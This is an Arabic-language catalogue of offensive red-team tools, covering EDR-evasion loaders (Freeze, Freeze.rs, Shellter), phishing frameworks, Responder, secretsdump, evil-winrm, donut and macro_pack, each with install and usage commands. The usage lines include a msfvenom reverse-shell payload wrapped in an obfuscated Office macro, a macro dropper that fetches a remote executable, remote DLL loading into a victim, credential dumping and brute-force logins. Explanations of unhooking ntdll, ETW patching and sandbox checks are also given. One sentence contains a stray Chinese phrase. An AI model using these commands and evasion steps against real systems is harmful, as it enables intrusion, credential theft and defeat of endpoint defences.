تستفيد Shellter من البنية الأصلية لملف PE ولا تقوم بأي تعديلات مثل تغيير أذونات الوصول للذاكرة في الأقسام (إلا إذا أراد المستخدم)، أو إضافة قسم إضافي بصلاحية RWE، أو أي شيء قد يبدو مريبًا تحت فحص مضاد الفيروسات.
يمكن العثور على معلومات README الكاملة هنا.
التثبيت: (Kali)```bash apt-get update apt-get install shellter
**التثبيت: (ويندوز)**
قم بزيارة [صفحة التحميل](https://www.shellterproject.com/download/) وقم بالتثبيت.
**الاستخدام:**
ما عليك سوى اختيار برنامج شرعي لوضع الباب الخلفي وتشغيل Shellter.
يمكن العثور على بعض النصائح المفيدة [هنا](https://www.shellterproject.com/tipstricks/).
يمكن العثور على الكثير من العروض التوضيحية من المجتمع [هنا](https://www.shellterproject.com/shellter-community-demos/).

_الصورة مأخوذة من https://www.kali.org/tools/shellter/images/shellter.png_
### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)
Freeze هي أداة إنشاء حمولات تُستخدم لتجاوز ضوابط أمان EDR لتنفيذ شيل كود بطريقة خفية.
تستخدم Freeze تقنيات متعددة ليس فقط لإزالة خطافات EDR على مستوى المستخدم، ولكن أيضًا لتنفيذ الشيل كود بطريقة تتجاوز ضوابط المراقبة الأخرى لنقطة النهاية.
**التثبيت:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
الاستخدام:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

_الصورة مستخدمة من https://www.blackhatethicalhacking.com/tools/freeze/_
### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)
هذا السكريبت سينشئ مستند Microsoft Word مع صورة عن بُعد، مما يتيح التقاط تجزئات NTML من نقطة نهاية الضحية عن بُعد.
يتمتع Microsoft Word بالقدرة على تضمين الصور من مواقع بعيدة، بما في ذلك صورة عن بُعد مستضافة على خادم SMB يتحكم به المهاجم. وهذا يتيح لك فرصة الاستماع والتقاط تجزئات NTLM التي تُرسل عندما تفتح الضحية المُصادَق عليها مستند Word ويتم عرض الصورة.
**التثبيت:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
الاستخدام:```bash
./main.py 127.0.0.1 test.jpg 1
./main.py 127.0.0.1 test.jpg 0\n

_صورة مأخوذة من https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/_
---
### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)
إذا كنت ترغب في معرفة المزيد عن التقنيات المستخدمة في هذا الإطار، يرجى إلقاء نظرة على مدونة SourceZero والأداة الأصلية.
**الوصف:**
Freeze.rs هي أداة لإنشاء الحمولات تُستخدم لتجاوز ضوابط أمان EDR لتنفيذ شيل كود بطريقة خفية. تستخدم Freeze.rs تقنيات متعددة ليس فقط لإزالة خطافات EDR في مساحة المستخدم، ولكن أيضًا لتنفيذ شيل كود بطريقة تتجاوز ضوابط المراقبة الأخرى على نقاط النهاية.
**إنشاء عملية معلقة:**
عند إنشاء عملية، يتم تحميل Ntdll.dll كأول DLL؛ يحدث هذا قبل تحميل أي DLLs لـ EDR.这意味着 هناك تأخير بسيط قبل تحميل EDR وبدء ربط وتعديل تجميع DLLs النظامية. بالنظر إلى استدعاءات النظام في Windows في Ntdll.dll، يمكننا رؤية أنه لا يوجد شيء مربوط بعد. إذا قمنا بإنشاء عملية في حالة تعليق (أي مجمدة زمنيًا)، يمكننا أن نرى أنه لا يتم تحميل أي DLLs أخرى باستثناء Ntdll.dll. يمكنك أيضًا رؤية أنه لا توجد DLLs لـ EDR محملة، مما يعني أن استدعاءات النظام الموجودة في Ntdll.dll غير معدلة.

**توزيع العناوين العشوائي (ASLR)**
لاستخدام هذه العملية المعلقة النظيفة لإزالة الخطافات من مُحمّل Freeze.rs، نحتاج إلى طريقة للعثور على ذاكرة العملية المعلقة النظيفة وقراءتها برمجيًا. هنا يأتي دور توزيع العناوين العشوائي (ASLR). ASLR هي آلية أمان لمنع الثغرات القائمة على تلف ذاكرة المكدس. يقوم ASLR بتوزيع مساحة العناوين داخل العملية بشكل عشوائي، لضمان أن تكون جميع العناصر المعينة في الذاكرة، المكدس، الكومة، والبرنامج القابل للتنفيذ نفسه، فريدة. الآن، هذا هو الجزء المثير للاهتمام لأنه بينما يعمل ASLR، فإنه لا يعمل مع الكود المستقل عن الموقع مثل DLLs. ما يحدث مع DLLs (خاصة DLLs النظامية المعروفة) هو أن مساحة العناوين تُوزع بشكل عشوائي مرة واحدة عند بدء التشغيل. هذا يعني أننا لسنا بحاجة إلى تعداد معلومات عملية عن بُعد للعثور على العنوان الأساسي لـ ntdll.dll الخاص بها لأنه هو نفسه في جميع العمليات، بما في ذلك العملية التي نتحكم فيها. نظرًا لأن عنوان كل DLL هو نفسه في كل تشغيل، يمكننا سحب هذه المعلومات من عمليتنا الخاصة ولا نحتاج أبدًا إلى تعداد العملية المعلقة للعثور على العنوان.

باستخدام هذه المعلومات، يمكننا استخدام API ReadProcessMemory لقراءة ذاكرة عملية. استدعاء API هذا يرتبط عادةً بقراءة LSASS كجزء من أي هجوم قائم على بيانات الاعتماد؛ ومع ذلك، فهو ليس خبيثًا بطبيعته، خاصة إذا كنا نقرأ فقط قسمًا عشوائيًا من الذاكرة. المرة الوحيدة التي سيتم فيها وضع علامة على ReadProcessMemory كجزء من شيء مريب هي إذا كنت تقرأ شيئًا لا ينبغي لك (مثل محتويات LSASS). لا ينبغي لمنتجات EDR وضع علامة على حقيقة استدعاء ReadProcessMemory أبدًا، حيث توجد استخدامات تشغيلية شرعية لهذه الوظيفة وسيؤدي ذلك إلى العديد من الإيجابيات الكاذبة.
يمكننا أخذ هذا خطوة إلى الأمام بقراءة قسم واحد فقط من Ntdll.dll حيث يتم تخزين جميع استدعاءات النظام - وهو قسم .text الخاص به، بدلاً من قراءة DLL بأكمله.
بدمج هذه العناصر، يمكننا الحصول برمجيًا على نسخة من قسم .text من Ntdll.dll لاستبدال قسم .text المربوط الحالي قبل تنفيذ شيل كود.
**تصحيح ETW**
يستخدم ETW استدعاءات نظام مدمجة لتوليد هذه القياسات عن بُعد. نظرًا لأن ETW أيضًا ميزة أصلية مدمجة في Windows، لا تحتاج منتجات الأمان إلى "ربط" استدعاءات نظام ETW للوصول إلى المعلومات. نتيجة لذلك، لمنع ETW، يقوم Freeze.rs بتصحيح العديد من استدعاءات نظام ETW، مما يفرغ المسجلات ويعيد تدفق التنفيذ إلى التعليمات التالية. أصبح تصحيح ETW الآن افتراضيًا في جميع المُحمّلات.
**شيل كود**

باستخدام حزمة NTAPI الخاصة بـ Rust، يمكنك رؤية أن كل هذه الاستدعاءات لا تظهر تحت ntdll.dll، ومع ذلك فهي لا تزال موجودة داخل العملية.

ونتيجة لذلك:


**لماذا Rust؟**
بدأ هذا كمشروع ممتع لتعلم Rust وتطور ليصبح إطارًا خاصًا به.
**المساهمة**
تم تطوير Freeze.rs باستخدام Rust.
**التثبيت**
إذا لم يتم تثبيت Rust و Rustup، يرجى تثبيتهما. إذا كنت تقوم بتجميعه من OSX أو Linux، تأكد من إضافة الهدف "x86_64-pc-windows-gnu". للقيام بذلك، قم بتشغيل الأمر التالي:
بمجرد الانتهاء، يمكنك تجميع Freeze.rs، قم بتشغيل الأوامر التالية، أو استخدم الثنائي المُجمّع:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release
من هناك، سيتم العثور على الإصدار المترجم في target/release (لاحظ أنه إذا لم تضع --release فسيكون الملف في target/debug/)```bash
___________
_ /_ ____ ____ ________ ____ _______ ______
| ) _ __ _/ __ _/ __ \_ // __ \ _ __ / /
| \ | | /\ /\ / / /\ / | | /_
_ / || _ >_ >___ \___ > /\ |__| /____ >
/ / / / / / /
(@Tyl0us)
Soon they will learn that revenge is a dish... best served COLD & Rusty...
USAGE: Freeze-rs [FLAGS] [OPTIONS]
FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information
OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.
**ثنائي مقابل DLL**
يمكن لـ Freeze.rs إنشاء ملف .exe أو .dll. لتحديد ذلك، تأكد من أن خيار سطر الأوامر `-O` ينتهي إما بـ .exe للثنائيات أو .dll لملفات DLL. لا يتم دعم أنواع الملفات الأخرى حاليًا. في حالة ملفات DLL، يمكن لـ Freeze.rs أيضًا إضافة وظائف تصدير إضافية. للقيام بذلك، استخدم `-export` مع اسم دالة التصدير المحدد.
**التشفير**
يعد تشفير الشيل كود تقنية مهمة تستخدم لحمايته من الاكتشاف والتحليل بواسطة منتجات EDR وحلول الأمان الأخرى. يأتي Freeze.rs مع طرق متعددة لتشفير الشيل كود، وتشمل هذه AES وELZMA وRC4.
**AES**
AES (معيار التشفير المتقدم) هو خوارزمية تشفير متماثلة تُستخدم على نطاق واسع لتشفير البيانات. يستخدم Freeze.rs حجم بت 256 من AES لتشفير الشيل كود. ميزة استخدام AES لتشفير الشيل كود هي أنه يوفر تشفيرًا قويًا ومدعومًا على نطاق واسع من قبل مكتبات التشفير. ومع ذلك، فإن استخدام حجم كتلة ثابت يمكن أن يجعله عرضة لهجمات معينة، مثل هجوم الوسادة الحشوية.
**ELZMA**
ELZMA هي خوارزمية ضغط وتشفير تُستخدم غالبًا في البرامج الضارة لإخفاء الكود. لتشفير الشيل كود باستخدام ELZMA، يتم أولاً ضغط الشيل كود باستخدام خوارزمية ELZMA. ثم يتم تشفير البيانات المضغوطة باستخدام مفتاح عشوائي. يتم بعد ذلك تضمين البيانات المشفرة والمفتاح في كود الاستغلال. ميزة استخدام ELZMA لتشفير الشيل كود هي أنه يوفر كلاً من الضغط والتشفير في خوارزمية واحدة. يمكن أن يساعد هذا في تقليل حجم كود الاستغلال وجعله أكثر صعوبة في الاكتشاف.
**RC4**
RC4 هي خوارزمية تشفير متماثلة تُستخدم غالبًا في البرامج الضارة لتشفير الشيل كود. وهي عبارة عن تشفير تدفقي يمكنه استخدام مفاتيح متغيرة الطول ومعروفة ببساطتها وسرعتها.
**وحدة التحكم**
يستخدم Freeze.rs تقنية لإنشاء العملية أولاً ثم نقلها إلى الخلفية. هذا يفعل شيئين - أولاً، يساعد في إبقاء العملية مخفية، وثانيًا، يتجنب اكتشافها بواسطة أي منتج EDR. يمكن أن يكون إنشاء عملية في الخلفية مباشرة مشبوهًا جدًا ومؤشرًا على الضرر. يفعل Freeze.rs ذلك عن طريق استدعاء دالتي Windows `GetConsoleWindow` و `ShowWindow` بعد إنشاء العملية وتحميل خطافات EDR، ثم تغيير سمات النافذة إلى مخفية.
إذا تم تحديد خيار سطر الأوامر `-console`، فلن يخفي Freeze.rs العملية في الخلفية. بدلاً من ذلك، سيضيف Freeze.rs العديد من رسائل التصحيح التي تعرض ما يفعله المُحمل.
---
### [🔙](#قائمة-الأدوات)WSH
**إنشاء الحمولة:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
تنفيذ:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted
### [🔙](#tool-list)HTA
**إنشاء الحمولة:**```html
<html>
<body>
<script>
var c = "cmd.exe";
new ActiveXObject("WScript.Shell").Run(c);
</script>
</body>
</html>
تنفيذ: تشغيل الملف
إنشاء الحمولة:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
**تنفيذ:** تعيين الدالة إلى Auto_Open() في مستند ممكّن بماكرو
# الوصول الأولي
### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)
Bash Bunny هي أداة هجوم USB فيزيائية ونظام توصيل حمولات متعدد الوظائف. صُمِّمت ليتم توصيلها بمنفذ USB في الكمبيوتر ويمكن برمجتها لأداء مجموعة متنوعة من الوظائف، بما في ذلك التلاعب بالبيانات واستخراجها، وتثبيت البرامج الضارة، وتجاوز الإجراءات الأمنية.
[hackinglab: Bash Bunny – دليل](https://hackinglab.cz/en/blog/bash-bunny-guide/)
[توثيق Hak5](https://docs.hak5.org/bash-bunny/)
[مستودع حمولات رائع](https://github.com/hak5/bashbunny-payloads)
[صفحة المنتج](https://hak5.org/products/bash-bunny)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)
evilginx2 + gophish. (GoPhish) Gophish هو إطار تصيد قوي مفتوح المصدر يجعل من السهل اختبار تعرض مؤسستك للتصيد. (evilginx2) إطار هجوم مستقل من نوع رجل في المنتصف يُستخدم لتصيد بيانات اعتماد تسجيل الدخول مع ملفات تعريف الارتباط الخاصة بالجلسة، مما يسمح بتجاوز المصادقة الثنائية.
**التثبيت:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish
الاستخدام:``` Usage: ./setup <subdomain(s)>

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)
هذا الإطار رائع لإنشاء حملات للوصول الأولي، 'يحتوي SET على عدد من نواقل الهجوم المخصصة التي تسمح لك بصنع هجوم معقول بسرعة'.
**تثبيت:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
الاستخدام:```bash python3 setoolkit

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)
أداة رائعة لهجمات القوة الغاشمة لتسجيل الدخول. يمكنها مهاجمة عدد من الخدمات بما في ذلك SSH وFTP وTELNET وHTTP وغيرها.
**التثبيت:**```bash
sudo apt install hydra
الاستخدام:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)
SquarePhish هي أداة تصيّد متطورة تستخدم تقنية تجمع بين تدفق مصادقة رمز جهاز OAuth ورموز QR (انظر [PhishInSuits](https://github.com/secureworks/PhishInSuits) لمزيد من المعلومات حول تدفق رمز جهاز OAuth لهجمات التصيّد).
خطوات الهجوم:
- إرسال رمز QR ضار إلى الضحية
- مسح الضحية لرمز QR باستخدام جهاز محمول
- توجيه الضحية إلى خادم يتحكم به المهاجم (بدء عملية تدفق مصادقة رمز جهاز OAuth)
- إرسال رمز MFA إلى الضحية عبر البريد الإلكتروني (تفعيل مؤقت 15 دقيقة لتدفق رمز جهاز OAuth)
- يقوم المهاجم باستقصاء المصادقة
- إدخال الضحية للرمز في موقع Microsoft الشرعي
- يحفظ المهاجم رمز المصادقة
**التثبيت:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
ملاحظة: قبل استخدام أي من الوحدتين، قم بتحديث المعلومات المطلوبة في ملف settings.config المشار إليها بـ Required.
الاستخدام (Email Module):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments: -h, --help show this help message and exit
-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL victim email address to send initial QR code email to
**الاستخدام (وحدة الخادم):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging

King Phisher هي أداة تتيح للمهاجمين إنشاء وإرسال رسائل التصيد الاحتيالي (Phishing) إلى الضحايا بهدف الحصول على معلومات حساسة.
تتضمن الأداة ميزات مثل القوالب القابلة للتخصيص، وإدارة الحملات، وإمكانيات إرسال البريد الإلكتروني، مما يجعلها أداة قوية وسهلة الاستخدام لتنفيذ هجمات التصيد. باستخدام King Phisher، يمكن للمهاجمين استهداف الأفراد أو المؤسسات برسائل تصيد مقنعة وموجهة، مما يزيد من فرص نجاح هجماتهم.
تثبيت (Linux - Client & Server):```bash
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh
**الاستخدام:**
بمجرد تثبيت King Phisher، يُرجى اتباع [صفحة الويكي](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) لإعداد SSH، تكوين قاعدة البيانات، خادم SMTP، إلخ.

# التنفيذ
### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)
Responder هي أداة لتسميم بروتوكولي LLMNR و NBT-NS على الشبكة، للسماح بالتقاط بيانات الاعتماد وتنفيذ تعليمات برمجية عشوائية.
يتم استخدام بروتوكولي LLMNR (حل الأسماء متعددة البث على الرابط المحلي) و NBT-NS (خدمة أسماء NetBIOS) من قبل أنظمة ويندوز لحل أسماء المضيفين إلى عناوين IP على شبكة محلية. إذا تعذر حل اسم مضيف باستخدام هذه البروتوكولات، فسيقوم النظام ببث طلب لاسم المضيف إلى الشبكة المحلية.
يستمع Responder إلى هذه البثوث ويستجيب بعنوان IP مزيف، مخادعًا النظام الطالب لإرسال بيانات اعتماده إلى المهاجم.
**التثبيت:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder
الاستخدام:```bash
./Responder.py [options]
./Responder.py -I eth0 -wrf
يمكن العثور على معلومات الاستخدام الكاملة [هنا](https://github.com/SpiderLabs/Responder#usage).

_الصورة المستخدمة من https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/_
### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
أداة مساعدة هي جزء من مكتبة Impacket يمكن استخدامها لاستخراج تجزئات كلمات المرور والأسرار الأخرى من نظام Windows.
تقوم بذلك عن طريق التفاعل مع قاعدة بيانات مدير حسابات الأمان (SAM) على النظام واستخراج كلمات المرور المجزأة وغيرها من المعلومات، مثل:
- تجزئات كلمات المرور للحسابات المحلية
- تذاكر Kerberos والمفاتيح
- أسرار LSA
**التثبيت:**```bash
python3 -m pip install impacket
الاستخدام:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

_الصورة مستخدمة من https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_
### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)
Evil-WinRM هي أداة توفر واجهة سطر أوامر للإدارة عن بُعد لنظام ويندوز (WinRM: _خدمة تسمح للمسؤولين بتنفيذ الأوامر عن بُعد على جهاز يعمل بنظام ويندوز_).
تسمح Evil-WinRM للمهاجم بالاتصال عن بُعد بجهاز ويندوز باستخدام WinRM وتنفيذ أوامر عشوائية.
تتضمن بعض الميزات:
- تحميل نصوص Powershell في الذاكرة
- تحميل ملفات dll في الذاكرة لتجاوز بعض برامج مكافحة الفيروسات
- تحميل حمولات x64
- دعم تمرير التجزئة (Pass-the-hash)
- رفع وتنزيل الملفات المحلية والبعيدة
**التثبيت: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
تثبيت: (Ruby gem)```bash gem install evil-winrm
يمكن العثور على تعليمات التثبيت البديلة [هنا](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).
**الاستخدام:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
# Upload local files to victim
upload local_filename
upload local_filename destination_filename
# Download remote files to local machine
download remote_filename
download remote_filename destination_filename
# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe
# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
يمكن العثور على وثائق الاستخدام الكاملة هنا.

الصورة مستخدمة من https://korbinian-spielvogel.de/posts/heist-writeup/
أداة للتنفيذ في الذاكرة لملفات VBScript وJScript وEXE وDLL وتجميعات dotNET. يمكن استخدامها لتحميل وتشغيل حمولات مخصصة على الأنظمة المستهدفة دون الحاجة إلى إسقاط ملفات على القرص.
التثبيت: (Windows)```bash git clone http://github.com/thewover/donut.git
لتوليد قالب المحمل (loader template)، المكتبة الديناميكية donut.dll، المكتبة الثابتة donut.lib والمولد donut.exe. ابدأ موجه أوامر المطور الخاص بـ Microsoft Visual Studio (x64)، انتقل إلى الدليل حيث قمت بنسخ مستودع Donut وأدخل التالي:```bash
nmake -f Makefile.msvc
لفعل الشيء نفسه، باستثناء استخدام MinGW-64 على ويندوز أو لينكس، انتقل إلى الدليل الذي استنسخت فيه مستودع Donut وأدخل ما يلي:```bash make -f Makefile.mingw
**التثبيت: (Linux)**```bash
pip3 install donut-shellcode
الاستخدام:```bash
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
للحصول على معلومات الاستخدام الكاملة، راجع صفحة donut على [GitHub](https://github.com/TheWover/donut/#4-usage).
راجع [منشور مدونة حديث](https://thewover.github.io/Bear-Claw/) من The Wover لمزيد من المعلومات.

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)
أداة تستخدم لأتمتة إخفاء وإنشاء مستندات Office، ونصوص VBScript، والاختصارات، وغيرها من التنسيقات للفريق الأحمر.
**التثبيت: (ثنائي)**
1. احصل على أحدث إصدار ثنائي من [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. قم بتنزيل الثنائي على جهاز كمبيوتر مثبت عليه Microsoft Office أصلي.
3. افتح وحدة التحكم، انتقل إلى دليل الثنائي باستخدام CD ثم قم باستدعاء الثنائي.
**التثبيت: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt
الاستخدام:```bash
python3 macro_pack.py --help
macro_pack.exe --listformats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
macro_pack.exe -f empire.vba -o -G myDoc.docm
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
echo calc.exe | macro_pack.exe --dde -G calc.xslx

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
مجموعة من نصوص ووحدات PowerShell النصية التي يمكن استخدامها لتحقيق أهداف متنوعة في اختبار الاختراق (red teaming).
بعض ميزات PowerSploit:
- تفريغ تجزئات كلمات المرور واستخراج كلمات المرور النصية الصريحة من الذاكرة
- رفع الصلاحيات وتجاوز الضوابط الأمنية
- تنفيذ كود PowerShell عشوائي وتجاوز قيود التنفيذ
- إجراء استطلاع واكتشاف للشبكة
- إنشاء الحمولات (payloads) وتنفيذ الثغرات
**التثبيت:** _1. احفظ في مجلد وحدات PowerShell_
أولاً، ستحتاج إلى تنزيل [مجلد PowerSploit](https://github.com/PowerShellMafia/PowerSploit) وحفظه في مجلد وحدات PowerShell الخاص بك.
يمكن العثور على مسار مجلد وحدات PowerShell الخاص بك باستخدام الأمر التالي:```
$Env:PSModulePath
تثبيت: 2. تثبيت PowerSploit كوحدة PowerShell
ستحتاج بعد ذلك إلى تثبيت وحدة PowerSploit (استخدم اسم المجلد الذي تم تنزيله).
ملاحظة: قد تمنعك سياسة تنفيذ PowerShell من ذلك، لإصلاح هذا قم بتشغيل الأمر التالي.``` powershell.exe -ep bypass
الآن يمكنك تثبيت وحدة PowerSploit.```
Import-Module PowerSploit
الاستخدام:``` Get-Command -Module PowerSploit

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)
أداة يمكن استخدامها لتنفيذ إجراءات متنوعة تتعلق ببيئات Microsoft Active Directory (AD)، مثل تفريغ تجزئات كلمات المرور، إنشاء/حذف المستخدمين، وتعديل خصائص المستخدم.
بعض ميزات Rubeus:
- Kerberoasting
- Golden ticket attacks
- Silver ticket attacks
**التثبيت: (تنزيل)**
يمكنك تثبيت الثنائي غير الرسمي المُجمَّع مسبقًا لـ Rubeus [من هنا](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).
**التثبيت: (تجميع)**
Rubeus متوافق مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح مشروع rubeus [.sln](https://github.com/GhostPack/Rubeus)، اختر "Release"، وقم بالبناء.
**الاستخدام:**```
Rubeus.exe -h

أداة مفيدة لفحص نقطة نهاية الضحية بحثًا عن ثغرات تتعلق بالعمليات ذات النزاهة العالية، والمجموعات، والمسارات القابلة للاختطاف، إلخ.
التثبيت: (تنزيل)
يمكنك تثبيت الثنائي المُجمّع مسبقًا غير الرسمي لـ SharpUp هنا.
التثبيت: (تجميع)
SharpUp متوافق مع Visual Studio 2015 Community Edition. افتح ملف المشروع .sln لـ SharpUp هنا، اختر "Release"، وابْنِ.
الاستخدام:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.
SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.
SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)
MS-SQL (Microsoft SQL Server) هو نظام إدارة قواعد بيانات علائقية تم تطويره وتسويقه بواسطة Microsoft.
تم تصميم هذه الأداة من C# لـ MS-SQL للاستطلاع الهجومي وما بعد الاستغلال. للحصول على معلومات مفصلة حول كل تقنية، راجع [wiki](https://github.com/skahwah/SQLRecon/wiki).
**التثبيت: (ثنائي)**
يمكنك تنزيل أحدث إصدار ثنائي من [هنا](https://github.com/skahwah/SQLRecon/releases).
**الاستخدام:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami
# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami
# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases
# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019
يمكن العثور على معلومات الاستخدام الكاملة في الويكي.
يمكن العثور على معلومات استخدام الوحدة النمطية للأداة هنا.

الصورة مأخوذة من صفحة تعليمات SQLRecon
هذا المورد هو مجموعة من أشهر التقنيات المعروفة لتجاوز AppLocker.
نظرًا لأنه يمكن تكوين AppLocker بطرق مختلفة، يحتفظ @api0cradle بقائمة مُتحقق منها من التجاوزات (التي تعمل ضد قواعد AppLocker الافتراضية) وقائمة تحتوي على تقنية تجاوز محتملة (اعتمادًا على التكوين) أو يُزعم أن شخصًا ما قد قام بتجاوزها.
ولديهم أيضًا قائمة بتقنيات التجاوز العامة بالإضافة إلى قائمة قديمة من طرق التنفيذ عبر DLLs.
القوائم المفهرسة

الصورة مأخوذة من https://github.com/api0cradle/UltimateAppLockerByPassList
مشغل Empire يعتمد على JavaScript و VBScript، يعمل داخل مضيف PowerShell المضمن الخاص به.
يعمل كلا المشغلين داخل مضيف PowerShell المضمن الخاص بهما، لذلك لا نحتاج إلى PowerShell.exe.
قد يكون هذا مفيدًا عندما تقوم شركة بحظر PowerShell.exe و/أو تستخدم حل قائمة السماح للتطبيقات، ولكنها لا تمنع تشغيل ملفات JS/VBS.
الاستخدام:
بالنسبة لإصدار JavaScript استخدم المتغير التالي:```javascript var EncodedPayload = "";
لإصدار VBScript، استخدم المتغير التالي:```vbscript
Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
ثم قم بتشغيل: wscript.exe StarFighter.js أو StarFighter.vbs على الهدف، أو انقر نقرًا مزدوجًا على المشغلات داخل المستكشف.

الصورة مستخدمة من https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html
الهدف من هذا المشروع هو إنشاء ملفات .html تحتوي على ملف HTA مشفر.
الفكرة هي أنه عندما يزور هدفك الصفحة، يتم جلب المفتاح ويتم فك تشفير ملف HTA ديناميكيًا داخل المتصفح ويتم دفعه مباشرة إلى المستخدم.
هذه تقنية مراوغة لتجاوز فحص المحتوى / نوع الملف المطبق من قبل بعض الأجهزة الأمنية.
مزيد من المعلومات التقنية هنا.
التثبيت:``` git clone https://github.com/nccgroup/demiguise cd demiguise
**الاستخدام:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

الصورة مستخدمة من https://github.com/nccgroup/demiguise
